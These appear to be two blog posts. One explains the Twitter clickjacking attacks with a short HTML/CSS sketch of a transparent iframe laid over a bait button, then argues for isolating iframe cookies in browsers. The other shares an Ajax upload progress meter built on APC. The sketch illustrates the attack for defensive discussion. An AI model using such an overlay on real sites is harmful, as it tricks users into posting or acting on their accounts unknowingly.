The recent clickjacking attacks on Twitter have been rather popular in the social media realm these past few weeks (read more at Jeff Jones's blog, or Chris Shiflett's), and tragically this is likely only the tip of the iceberg. The attack works so well because Twitter allows you to pre-populate a message in the text area via the URL, but has CSRF protection on the submission itself. Your browser, having obligingly rendered the page (despite you possibly not being able to see it), received the CSRF token; the server held onto its copy; and when you click the button, willingly or not, the submission is accepted.
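In rough terms, the hostile page looks something like this (a minimal illustrative sketch; the URL parameters, sizes, and positioning are made up for the example, not the actual attack code):

<style>
  /* The bait the victim sees and believes they are clicking */
  #bait   { position: absolute; top: 10px; left: 10px; z-index: 1; }
  /* The real target, stacked on top but fully transparent, positioned
     so its submit button sits directly over the bait */
  #target { position: absolute; top: 0; left: 0;
            width: 600px; height: 400px; opacity: 0; z-index: 2; }
</style>
<button id="bait">Click here to win!</button>
<iframe id="target" src="http://twitter.com/home?status=Don't+click+this"></iframe>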

I say tip of the iceberg because I believe this is only the first generation of attacks; the second generation likely isn't very far off. Many sites are vulnerable (in part) to traditional CSRF attacks; Amazon.com had an outstanding CSRF vulnerability for quite a while. They rely on a few specific pages (such as the checkout page, or a confirmation page) being invulnerable to attack to defend the site as a whole, ignoring 'lesser' vulnerabilities and concentrating on a few key choke points. Consider a two-stage attack: the first stage leverages existing CSRF vulnerabilities, the second uses clickjacking to circumvent the defended pages, and voilà, the whole thing comes crumbling down. I will mention that in this case Amazon may be safe: while clickjacking does bypass many transparent CSRF defenses, re-authentication remains safe and effective.

While we have seen several iterative levels of defense from different sites, I actually place much of the blame (and the onus of resolving the problem) on the browser itself. While I like iFrames in several circumstances, I really feel they deserve a special place when it comes to the same-origin policy. Currently they are treated in the same manner as a page requested directly through the address bar: they can reference external resources, access previously set cookies, and create new ones.

I feel they are children of the page in which they are placed, and should inherit their state from there. So if a user loads a page from evil.example.org which embeds an iFrame sourced from Facebook.com, that frame effectively represents a fresh browser: cookies set during earlier direct browsing of Facebook are unavailable, and by the same token, any cookies sent to the embedded iFrame are destroyed once the user navigates away from that page. The same-origin policy applies as before, but the iFrame now truly represents an island, independent from all others.

This would do a tremendous amount of work to destroy the attacks we're now seeing, and the ones to come in the future: it becomes impossible to inherit state into an attacking page. Care must of course be taken to ensure that layered technologies (such as Flash or Silverlight) don't provide a workaround to this defense. While I do see this causing possible issues for advertisers (who routinely embed content, and hit you with cookies), I'd be interested in more critical ways it would interfere with what we're doing now.

Note: I'd also like web browsers and web servers to work together a bit more on the CSRF issue. When requesting a document referenced by an <img> tag, browsers should demand a response with a MIME type of image/*. They don't; by and large they indicate a preference for an image, but a willingness to accept */*, which is useless, as any other MIME type is generally rendered as a broken image. Most web servers are also at fault, since they obligingly and knowingly serve content such as text/plain or text/html to a client that asked for something of type image/*.
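As a thought experiment, server-side enforcement could look something like this (hypothetical; no stock web server behaves this way today):

<?php
// Hypothetical strict-Accept check for an HTML document: if the client
// demanded only image/* (as a browser fetching an <img> ideally would),
// refuse to serve HTML rather than handing it over anyway.
$accept = isset($_SERVER['HTTP_ACCEPT']) ? $_SERVER['HTTP_ACCEPT'] : '*/*';

if (strpos($accept, 'image/') !== false
    && strpos($accept, 'text/html') === false
    && strpos($accept, '*/*') === false) {
    header('HTTP/1.1 406 Not Acceptable');
    exit;
}
header('Content-Type: text/html');
?>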
On my #secretProject (#wmps) we need a file upload progress meter, and I'd rather not use one of the Flash-based solutions (which are apparently breaking like heck under Flash 10). There are a couple of tutorials out there demonstrating this: Rasmus', as well as a great one at IBM. My issue with both was that they were using Ajax libraries (it's kind of hidden in the IBM one, which ends up relying on some functionality from Google Maps that I don't really understand).

Anyways, go read the IBM one, then substitute in this function and you've got a non-Internet Explorer Ajax upload meter, with no external dependencies. Remember you need APC with the RFC 1867 option (apc.rfc1867) enabled.

If you need hints on making this cross-browser (I'm presenting a stripped-down example on purpose), take a look at the great info in the Mozilla Ajax Series.
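The gist, if you just want the shape of it, is wrapping the object creation, since IE 6 and earlier only expose Ajax through ActiveX. Something like this (a sketch of the standard pattern, not lifted from the Mozilla docs verbatim):

function createRequest() {
    if (window.XMLHttpRequest) {
        return new XMLHttpRequest(); // Mozilla, Safari, Opera, IE 7+
    } else if (window.ActiveXObject) {
        return new ActiveXObject("Microsoft.XMLHTTP"); // IE 5/6
    }
    return null; // no Ajax support at all
}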

Code after the jump:


function getProgress() {
    // Replaces the GDownloadUrl() call from the IBM tutorial with a plain
    // XMLHttpRequest, removing the Google Maps dependency.
    var httpRequest = new XMLHttpRequest();
    httpRequest.open('GET', 'getprogress.php?progress_key=<?php echo $id; ?>');
    httpRequest.onreadystatechange = function() {
        if (httpRequest.readyState == 4) {
            var percent = parseInt(httpRequest.responseText, 10);
            document.getElementById("progressinner").style.width = percent + "%";
            document.getElementById("progressinner").innerHTML = percent + "%";
            if (percent < 100) {
                // Update the bar every 5 seconds; appropriate for really
                // freaking huge uploads.
                setTimeout(getProgress, 5000);
            }
        }
    };
    httpRequest.send(null);
}
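For completeness, getprogress.php follows the pattern from Rasmus' tutorial: with apc.rfc1867 enabled, APC tracks each upload under 'upload_' plus the progress key the form submits, so something along these lines echoes the percentage back (a sketch; add whatever error handling you need):

<?php
// Sketch of getprogress.php: apc_fetch() returns an array with (among
// other things) 'current' and 'total' byte counts for the upload.
$status = apc_fetch('upload_' . $_GET['progress_key']);

if ($status === false || $status['total'] == 0) {
    echo 0; // upload not registered yet
} else {
    echo round($status['current'] / $status['total'] * 100);
}
?>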

